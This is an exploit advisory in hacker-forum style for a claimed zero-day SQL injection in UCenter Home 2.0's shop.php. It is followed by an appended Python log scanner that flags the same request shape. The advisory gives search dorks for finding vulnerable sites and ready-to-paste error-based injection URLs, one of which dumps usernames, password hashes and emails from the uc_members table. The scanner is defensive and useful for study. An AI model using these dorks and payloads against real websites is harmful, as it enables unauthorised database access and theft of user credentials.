__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

For Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit your DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
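
Detection aid for the request shape above (an added example, not part of the original advisory): a legitimate shopid on shop.php?ac=view is a plain decimal integer, so any other value is worth flagging in web server logs. The log lines are constructed, and the names classify and scan are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 900',
    '198.51.100.20 - - [01/Jan/2024:10:02:00 +0000] "GET /shop.php?ac=view&shopid=12%27 HTTP/1.1" 200 640',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Substrings of the error-based payload shape shown in the advisory.
MARKERS = ("information_schema", "floor(rand(", "group by", "concat(")

def classify(url):
    """Return the reasons a request looks like shopid injection, or []."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/shop.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
    if "view" not in params.get("ac", []):
        return []
    reasons = []
    for value in params.get("shopid", []):
        if not re.fullmatch(r"[0-9]+", value):
            reasons.append("non-numeric shopid")
            lowered = re.sub(r"\s+", " ", value.lower())
            hits = [m for m in MARKERS if m in lowered]
            if hits:
                reasons.append("error-based SQLi markers: " + ", ".join(hits))
    return reasons

def scan(lines):
    """Return (client_ip, reasons) for every suspicious request line."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        reasons = classify(m.group(2)) if m else []
        if reasons:
            findings.append((m.group(1), reasons))
    return findings

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, "; ".join(reasons))
```

The same integer-only rule, enforced in the application before the value reaches the query, closes the injection point itself.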